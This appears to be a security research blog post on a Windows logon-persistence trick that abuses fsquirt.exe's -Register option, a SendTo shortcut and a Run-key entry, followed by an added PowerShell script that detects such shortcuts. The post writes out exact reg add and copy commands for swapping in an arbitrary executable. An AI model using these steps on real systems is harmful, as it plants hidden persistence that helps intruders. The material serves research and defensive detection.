The program in the title of this post is not very well-known. It’s being used for some random Bluetooth stuff that not too many PC users care about (okay, it’s a bit of a stretch, but I guess it’s really not very well-known).
How do you make use of a binary no one cares about?
When I first looked at fsquirt.exe’s command line arguments, I immediately thought of using it in my Beyond Good Ol’ Run key series, as it was really a perfect candidate. Then I discovered that, despite it behaving in a predictable way and delivering what I needed it to, I could not write the new post in that series, because the intended trick simply didn’t work.
I know it sounds dramatic, but this is the nature of the research.
I still wanted to make a triumph of the discovery though, so here we are…
When you run fsquirt.exe with the -Register argument it will create a LNK file c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK that will lead Explorer to add the following item under your Send To Explorer submenu:
Running it with -UnRegister argument will remove this entry.
But here’s the secret…
Run:
c:\windows\System32\fsquirt.exe -Register
To ensure that this LNK file is created:
c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
Add a legitimate Run entry pointing to the LNK created in the previous step:
reg add "hkcu\software\microsoft\windows\currentversion\run" /v foo /d "c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK"
Copy c:\windows\System32\fsquirt.exe to a different folder, e.g. c:\test, by running a command like this:
copy c:\windows\System32\fsquirt.exe c:\test
Re-register it to a different location:
c:\test\fsquirt.exe -Register
This will overwrite the LNK file above to point to c:\test\fsquirt.exe.
Overwrite c:\test\fsquirt.exe with any executable of your choice. The Run entry still points at the LNK, and the LNK now points at c:\test\fsquirt.exe, so you have an executable that will run any time the user logs on.
It’s a classic bait and switch.
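The defender's side of the steps above, as an added example that is not part of the original post: the Run value never names the executable, so a check of Run keys has to resolve any .lnk it finds and look at the real target. The script assumes only the two standard Run keys are of interest and uses the WScript.Shell COM object to read the shortcut.

```powershell
# Added example: list Run-key values that launch a .lnk and show what each shortcut really starts.
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
$shell = New-Object -ComObject WScript.Shell
$sys32 = (Join-Path $env:windir 'System32') + '\'

foreach ($key in $runKeys) {
    $item = Get-Item -Path $key -ErrorAction SilentlyContinue
    if (-not $item) { continue }
    foreach ($name in $item.GetValueNames()) {
        $data = [string]$item.GetValue($name)
        # Run data may be quoted and may carry arguments; keep only the .lnk path.
        if ($data -notmatch '^\s*"?([^"]+?\.lnk)') { continue }
        $lnk = $Matches[1]
        $target = ''; $sig = $null; $orig = $null
        if (Test-Path -LiteralPath $lnk) {
            # CreateShortcut opens an existing .lnk; TargetPath is the file it launches.
            $target = [string]$shell.CreateShortcut($lnk).TargetPath
            if ($target -and (Test-Path -LiteralPath $target)) {
                $sig  = (Get-AuthenticodeSignature -LiteralPath $target).Status
                $orig = (Get-Item -LiteralPath $target).VersionInfo.OriginalFilename
            }
        }
        [pscustomobject]@{
            RunKey           = $key
            ValueName        = $name
            Shortcut         = $lnk
            Target           = $target
            InSystem32       = $target.StartsWith($sys32, [StringComparison]::OrdinalIgnoreCase)
            Signature        = $sig
            OriginalFilename = $orig
        }
    }
}
```

Rows where the target sits outside System32, the signature status is not Valid, or OriginalFilename does not match the file name on disk are the ones to look at first.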